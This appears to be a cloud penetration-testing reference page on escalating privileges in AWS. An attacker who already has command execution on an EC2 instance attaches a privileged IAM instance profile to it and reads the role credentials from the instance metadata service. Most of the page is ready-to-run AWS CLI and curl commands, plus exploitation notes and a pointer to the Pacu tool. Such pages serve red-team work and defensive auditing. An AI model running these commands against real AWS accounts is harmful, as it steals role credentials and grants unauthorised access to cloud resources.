When you already have command execution on an EC2 instance but it carries no useful role, you do not need to launch a new one. With ec2:AssociateIamInstanceProfile (and iam:PassRole on the profile's role), attach a privileged instance profile to the instance, then read the role credentials from IMDS. If you also hold iam:AddRoleToInstanceProfile, you can first swap a privileged role into a profile before associating it. This is distinct from the EC2 RunInstances path: here the instance already exists and is yours.
Attach a profile to a running instance#
# if the instance has no profile, associate a privileged one
aws ec2 associate-iam-instance-profile \
--instance-id i-0123 --iam-instance-profile Name=<privileged-profile>
# or build the profile first by adding a privileged role to it
aws iam create-instance-profile --instance-profile-name p
aws iam add-role-to-instance-profile --instance-profile-name p --role-name <privileged-role>
aws ec2 associate-iam-instance-profile --instance-id i-0123 --iam-instance-profile Name=p
Read the credentials on the box#
TOKEN=$(curl -sX PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60')
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
Exploitation notes#
- If the instance already has a profile, use
ec2:ReplaceIamInstanceProfileAssociationinstead of associate. - Credentials refresh on the instance within a minute or two of association; poll IMDS until the new role appears.
- The role's trust policy must allow
ec2.amazonaws.com, which every instance-profile role already does. - See instance metadata for the IMDSv2 token flow and SSRF retrieval.
Tools#
- AWS CLI (
ec2 associate-iam-instance-profile,iam add-role-to-instance-profile). - Pacu (
iam__privesc_scan): detects this path in the privesc scan.